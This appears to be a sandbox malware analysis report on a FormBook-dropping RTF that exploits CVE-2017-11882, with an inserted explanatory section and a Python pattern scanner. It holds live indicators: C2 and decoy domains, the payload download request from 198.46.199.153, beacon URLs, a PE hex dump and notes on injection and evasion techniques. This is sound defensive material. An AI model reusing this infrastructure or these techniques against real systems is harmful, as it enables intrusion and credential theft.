
Windows Analysis Report 3nkW4MtwSD

Overview

General Information

Sample Name: 3nkW4MtwSD (renamed file extension from none to rtf)
Analysis ID: 528701
MD5: 5aad2b6635b3069402aaf6ff389bea64
SHA1: a8617ddffd6c934fcf3f64c6e84b1a23ffa9d092
SHA256: 718dcc870c0de487595feed4e5e43dc70fba6fa2aaac15462c0ba5c20028e7bd
Tags: rtf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2592 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1592 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2652 cmdline: "C:\Users\Public\vbc.exe" MD5: 075BD1E3E3E0C01794EE6A84BE2C585A)
      • vbc.exe (PID: 2412 cmdline: C:\Users\Public\vbc.exe MD5: 075BD1E3E3E0C01794EE6A84BE2C585A)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • raserver.exe (PID: 1892 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
          • cmd.exe (PID: 772 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
(31 further memory-dump matches are collapsed in the original report)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.0.vbc.exe.400000.9.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.0.vbc.exe.400000.9.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.vbc.exe.400000.9.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a49:$sqlite3step: 68 34 1C 7B E1
  • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a78:$sqlite3text: 68 38 2A 90 C5
  • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further unpacked-PE matches are collapsed in the original report)
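The Yara Overview above lists, for each matching rule, the byte strings that hit and the offset of each hit inside the dump or unpacked image. The three JPCERT/CC strings all have the shape 68 xx xx xx xx, which on x86 is a push of a 32-bit immediate; that those immediates are hashed API names is an assumption of this example, not something the report states. The following is an added example, not code from the report or from either rule author: a minimal scanner that searches a buffer for the report's byte sequences and prints hits in the same 0x<offset>:$name form. The buffer it scans is constructed here and is not the real vbc.exe image.

```python
"""Added example, not part of the Joe Sandbox report: a minimal scanner that
reports the byte sequences from the report's Yara rules in the same
'0x<offset>:$name' form the Yara Overview uses. Patterns are copied from the
report; the buffer scanned below is constructed and is not the real vbc.exe."""

# Strings as printed in the report: the three JPCERT/CC "Formbook" pushes and
# two of the yara-signator "Formbook_1" sequences.
PATTERNS = {
    "$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
    "$sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),
    "$sequence_7": bytes.fromhex("66 89 0C 02 5B 8B E5 5D"),
}


def find_all(buf, needle):
    """Every offset of needle in buf, overlapping occurrences included."""
    hits, start = [], 0
    while True:
        idx = buf.find(needle, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


def scan(buf, patterns=PATTERNS):
    """Map each pattern name to the offsets it occurs at."""
    return {name: find_all(buf, needle) for name, needle in patterns.items()}


def push_imm32(needle):
    """Decode a 5-byte x86 'push imm32' (opcode 0x68) into its constant.
    Each JPCERT string has that shape; that the constants are hashed API
    names is an assumption of this example, not something the report states."""
    if len(needle) != 5 or needle[0] != 0x68:
        return None
    return int.from_bytes(needle[1:], "little")


def formbook_verdict(hits):
    """Assumed rule condition: all three sqlite3 pushes must be present."""
    return all(hits[n] for n in ("$sqlite3step", "$sqlite3text", "$sqlite3blob"))


def build_sample():
    """Constructed buffer: NOP filler with the patterns planted at known offsets."""
    buf = bytearray(b"\x90" * 0x200)
    buf[0x40:0x45] = PATTERNS["$sqlite3step"]
    buf[0x80:0x85] = PATTERNS["$sqlite3text"]
    buf[0xC0:0xC5] = PATTERNS["$sqlite3blob"]
    buf[0x100:0x109] = PATTERNS["$sequence_0"]
    buf[0x140:0x149] = PATTERNS["$sequence_0"]  # the report also shows it twice
    return bytes(buf)


def report(buf):
    """Lines in the report's format, e.g. '0x40:$sqlite3step: 68 34 1C 7B E1'."""
    lines = []
    for name, offs in scan(buf).items():
        for off in offs:
            lines.append(f"0x{off:x}:{name}: {PATTERNS[name].hex(' ').upper()}")
    return lines


if __name__ == "__main__":
    sample = build_sample()
    print("\n".join(report(sample)))
    print("FormBook:", formbook_verdict(scan(sample)))
```

The point of reproducing the scan is to see why the same strings hit at different offsets in the memory dump (0x18849) and in the unpacked image (0x17a49): the dump is taken from a mapped region with its own base, while the unpack is the rebuilt PE, so the offsets shift by a constant but the relative layout of the three pushes stays the same.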

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 198.46.199.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1592, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: "C:\Users\Public\vbc.exe", CommandLine: "C:\Users\Public\vbc.exe", CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1592, ProcessCommandLine: "C:\Users\Public\vbc.exe", ProcessId: 2652
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: the same process-start event as the previous rule (C:\Users\Public\vbc.exe, ProcessId 2652, parent EQNEDT32.EXE ProcessId 1592)

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (the extracted configuration is reproduced in the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: 3nkW4MtwSD.rtf | Virustotal: Detection: 56%
Yara detected FormBook
Source: Yara match | File source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Antivirus / Scanner detection for submitted sample
Source: 3nkW4MtwSD.rtf | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: 4.0.vbc.exe.400000.9.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe (listed twice in the report)
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RAServer.pdb^ | source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb | source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
Source: Binary string: RAServer.pdb | source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
Source: global traffic | DNS query: name: www.mountfrenchlodge.net
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop ebx
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop ebx
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 198.46.199.153:80 (listed twice in the report)

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.cuteprofessionalscrubs.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.mountfrenchlodge.net
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.cuteprofessionalscrubs.com/9gr5/
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: global traffic | HTTP traffic detected:
  GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1
  Host: www.mountfrenchlodge.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1
  Host: www.cuteprofessionalscrubs.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 198.46.199.153
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 16:23:57 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 25 Nov 2021 02:23:58 GMTETag: "b4a00-5d193aabff887"Accept-Ranges: bytesContent-Length: 739840Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be f3 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3e 0b 00 00 0a 00 00 00 00 00 00 be 5b 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 5b 0b 00 4f 00 00 00 00 60 0b 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 3c 0b 00 00 20 00 00 00 3e 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 06 00 00 00 60 0b 00 00 08 00 00 00 40 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 48 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 5b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 d0 21 01 00 03 00 00 00 8c 
01 00 06 7c 6a 02 00 f0 f0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1
Source: global traffic | HTTP traffic detected:
  GET /70007/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 198.46.199.153
  Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:25:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:25:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: unknown | TCP traffic detected without corresponding DNS query: 198.46.199.153 (this event is recorded 50 times in the report)
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
